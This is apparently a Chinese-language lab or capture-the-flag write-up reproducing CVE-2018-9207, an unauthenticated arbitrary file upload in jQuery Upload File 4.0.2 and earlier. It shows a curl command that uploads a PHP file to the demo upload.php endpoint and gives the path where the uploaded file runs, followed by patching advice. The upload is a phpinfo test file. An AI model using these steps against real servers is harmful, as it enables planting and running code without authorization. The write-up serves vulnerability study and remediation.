jquery 文件上传 (CVE-2018-9207)漏洞复现

0x01 漏洞描述

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery-upload-file

0x02 影响范围

<= 4.0.2

0x03 漏洞复现

1、进入的页面

2、准备一个 php 文件

php 复制代码
<?php phpinfo(); ?>

3、通过虚拟机上传(把文件放进虚拟机里,并执行以下命令)

bash 复制代码
curl -F "myfile=@sh.php" "http://ip:端口/jquery-upload-file/php/upload.php"

4、浏览器访问路径

http://ip:port/jquery-upload-file/php/uploads/sh.php

Ctrl + F 搜 flag 关键字,即可获得 flag

0x04 漏洞修复

升级 jQuery File Upload 到官方安全版本(推荐 10.x 或至少 9.22.1+)

删除或禁用官方 demo 中不安全的上传处理代码(如 server/php/)

服务端限制上传文件类型,禁止上传可执行脚本(如 .php, .jsp 等)

上传接口必须设置身份认证或权限控制,禁止未授权访问

相关推荐
阿里云云原生6 小时前
Apache RocketMQ × AI:面向 Multi-Agent 的事件驱动架构
apache·rocketmq
讲师-汪春波20 小时前
[运维]宝塔 Apache环境使用CDN获取访客真实IP方法
运维·tcp/ip·apache·cdn
牛奶咖啡131 天前
zabbix实现监控Apache、Nginx、php-fpm应用的实操保姆级流程
nginx·apache·zabbix·php-fpm·zabbix监控apache·zabbix监控nginx·zabbix监控php-fpm
de之梦-御风2 天前
【工具分享】另一个免费开源的远程桌面服务-Apache Guacamole
开源·apache
tritone3 天前
在优豆云免费云服务器上搭建与配置Apache的实践笔记
服务器·网络·apache·1024程序员节
黑猫酋长3 天前
Apache Zeppelin:一款强大的数据分析和可视化工具
数据挖掘·数据分析·apache
belldeep3 天前
网络安全:Apache Druid 安全漏洞
网络安全·apache·druid
SelectDB3 天前
Apache Doris 4.0 版本正式发布:全面升级 AI 与搜索能力,强化离线计算
数据库·数据分析·apache
SelectDB3 天前
从 Snowflake 到 Apache Doris:Planet 实时分析成本直降 80%、查询加速 90 倍
数据库·数据分析·apache
一路向北⁢4 天前
基于 Apache POI 5.2.5 构建高效 Excel 工具类:从零到生产级实践
java·apache·excel·apache poi·easy-excel·fast-excel